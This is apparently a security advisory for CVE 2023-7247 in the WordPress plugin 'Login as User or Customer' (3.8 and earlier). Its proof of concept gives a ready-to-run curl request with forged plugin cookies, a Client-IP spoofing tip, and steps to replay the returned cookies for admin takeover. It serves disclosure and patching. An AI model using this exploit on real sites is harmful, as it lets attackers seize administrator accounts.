Login as User or Customer <= 3.8 – Admin Account Takeover | CVE 2023-7247

Description

The plugin does not prevent users to log in as any other user on the site.

Proof of Concept

1. As an admin, log in as some user. Note the user ID.
2. Run the following `curl` command, filling in the `ADMIN_ID` and the `USER_ID`:
    
    ```
    curl -v https://example.com/wp-admin/admin-ajax.php -H 'Cookie: wordpress_test_cookie=WP%20Cookie%20check; wploginas_new_user_id=USER_ID; loginas_old_user_id=ADMIN_ID' -d 'action=loginas_return_admin'
    ```
    - Note that this `curl` command has to come from the same IP address as the Admin originally used to switch to the user. The attacker may use the `Client-IP` header to fake their IP address if needed.

3. In the response, note the final `Set-Cookie` headers setting the `wordpress_sec_...` and `wordpress_logged_in_...` cookies (note that these cookies may be different if you are using `http` instead of `https`.
4. In your browser console in a logged-out tab, manually set those two cookies.
5. Visit `/wp-admin` and see that you are logged in as the admin user.